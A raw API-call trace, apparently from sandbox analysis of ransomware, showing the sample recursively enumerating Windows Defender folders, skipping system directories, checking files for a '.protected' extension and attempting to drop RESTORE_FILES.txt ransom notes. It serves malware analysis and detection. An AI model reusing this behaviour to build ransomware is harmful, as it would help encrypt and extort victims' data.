lstrcmpiW (lpString1="Quarantine", lpString2="$Recycle.bin") returned 1 [0093.271] lstrcmpiW (lpString1="Quarantine", lpString2="System Volume Information") returned -1 [0093.271] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned 60 [0093.271] lstrcmpW (lpString1="Quarantine", lpString2=".") returned 1 [0093.271] lstrcmpW (lpString1="Quarantine", lpString2="..") returned 1 [0093.271] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*") returned 62 [0093.271] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.271] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.271] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.271] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.271] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.271] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.271] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\.") returned 62 [0093.271] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.271] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.271] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.271] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.271] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.272] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.272] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned 
-1 [0093.272] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\..") returned 63 [0093.272] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.272] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.272] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.272] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.272] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt") returned 78 [0093.272] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.272] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.272] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.272] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.272] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt") returned 78 [0093.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\quarantine\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.273] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.273] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.273] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\RESTORE_FILES.txt") returned 67 [0093.273] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.273] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.273] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="Windows") returned -1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="Program Files") returned 1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="Program Files (x86)") returned 1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="$Recycle.bin") returned 1 [0093.273] lstrcmpiW (lpString1="Scans", lpString2="System Volume Information") returned -1 [0093.273] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned 55 [0093.273] lstrcmpW (lpString1="Scans", lpString2=".") returned 1 [0093.273] lstrcmpW (lpString1="Scans", lpString2="..") returned 1 [0093.273] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows 
Defender\\Scans\\*") returned 57 [0093.273] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.273] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.273] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.273] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.273] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.273] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.273] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\.") returned 57 [0093.273] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.273] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.273] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.273] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.273] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.273] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.274] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.274] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\..") returned 58 [0093.274] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.274] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.274] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.274] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0093.274] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0093.274] lstrcmpiW (lpString1="History", lpString2="Program 
Files (x86)") returned -1 [0093.274] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0093.274] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0093.274] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned 63 [0093.274] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0093.274] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0093.274] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*") returned 65 [0093.274] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.275] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.275] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.275] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.275] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.275] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.275] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\.") returned 65 [0093.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.275] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.275] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.275] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.275] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.275] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.275] lstrcmpiW (lpString1="..", 
lpString2="System Volume Information") returned -1 [0093.275] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\..") returned 66 [0093.275] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.275] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="Windows") returned -1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="Program Files") returned -1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="Program Files (x86)") returned -1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="$Recycle.bin") returned 1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="System Volume Information") returned -1 [0093.275] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 76 [0093.275] lstrcmpW (lpString1="CacheManager", lpString2=".") returned 1 [0093.275] lstrcmpW (lpString1="CacheManager", lpString2="..") returned 1 [0093.275] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned 78 [0093.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.276] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.276] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.276] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\.") returned 78 [0093.276] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.276] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\..") returned 79 [0093.276] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.276] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.276] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.protected") returned 96 [0093.276] StrStrIW (lpFirst="MpSfc.bin.protected", lpSrch=".protected") returned=".protected" [0093.276] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt") returned 94 [0093.276] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.276] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.276] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.276] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt") returned 94 [0093.276] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.276] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.276] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt") returned 81 [0093.276] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.276] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.276] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.276] lstrcmpiW (lpString1="Results", lpString2="Windows") returned -1 [0093.276] lstrcmpiW (lpString1="Results", lpString2="Program Files") returned 1 [0093.276] lstrcmpiW (lpString1="Results", lpString2="Program Files (x86)") returned 1 [0093.276] lstrcmpiW (lpString1="Results", lpString2="$Recycle.bin") returned 1 [0093.277] lstrcmpiW (lpString1="Results", lpString2="System Volume Information") returned -1 [0093.277] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 71 [0093.277] lstrcmpW (lpString1="Results", lpString2=".") returned 1 [0093.277] lstrcmpW (lpString1="Results", lpString2="..") returned 1 [0093.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*") returned 73 [0093.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.277] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.277] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.277] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.277] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.277] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\.") returned 73 [0093.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.277] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.277] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.277] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.277] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.277] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.277] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\..") returned 74 [0093.277] 
lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.277] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="Windows") returned -1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="Program Files") returned 1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="Program Files (x86)") returned 1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="$Recycle.bin") returned 1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="System Volume Information") returned -1 [0093.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned 80 [0093.277] lstrcmpW (lpString1="Resource", lpString2=".") returned 1 [0093.277] lstrcmpW (lpString1="Resource", lpString2="..") returned 1 [0093.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*") returned 82 [0093.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0093.278] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.278] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.278] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.278] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.278] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\.") returned 
82 [0093.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.278] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.278] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.278] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.278] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.278] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.278] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\..") returned 83 [0093.278] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.278] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.278] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt") returned 98 [0093.278] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.278] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.278] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) 
returned 1 [0093.278] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="Windows") returned -1 [0093.278] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="Program Files") returned -1 [0093.278] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="Program Files (x86)") returned -1 [0093.279] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="$Recycle.bin") returned 1 [0093.279] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="System Volume Information") returned -1 [0093.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected") returned 129 [0093.279] StrStrIW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpSrch=".protected") returned=".protected" [0093.279] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0093.279] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0093.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt") returned 98 [0093.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\resource\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.279] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.279] 
lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.279] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.279] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.279] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.279] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.279] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt") returned 89 [0093.279] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.279] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.279] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.279] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.279] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt") returned 89 [0093.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.280] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.280] lstrcmpiW (lpString1="Service", lpString2="Windows") returned -1 [0093.280] lstrcmpiW (lpString1="Service", lpString2="Program Files") returned 1 [0093.280] lstrcmpiW (lpString1="Service", 
lpString2="Program Files (x86)") returned 1 [0093.280] lstrcmpiW (lpString1="Service", lpString2="$Recycle.bin") returned 1 [0093.280] lstrcmpiW (lpString1="Service", lpString2="System Volume Information") returned -1 [0093.280] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 71 [0093.280] lstrcmpW (lpString1="Service", lpString2=".") returned 1 [0093.280] lstrcmpW (lpString1="Service", lpString2="..") returned 1 [0093.280] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned 73 [0093.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.280] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.280] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.280] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.280] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.280] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.280] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\.") returned 73 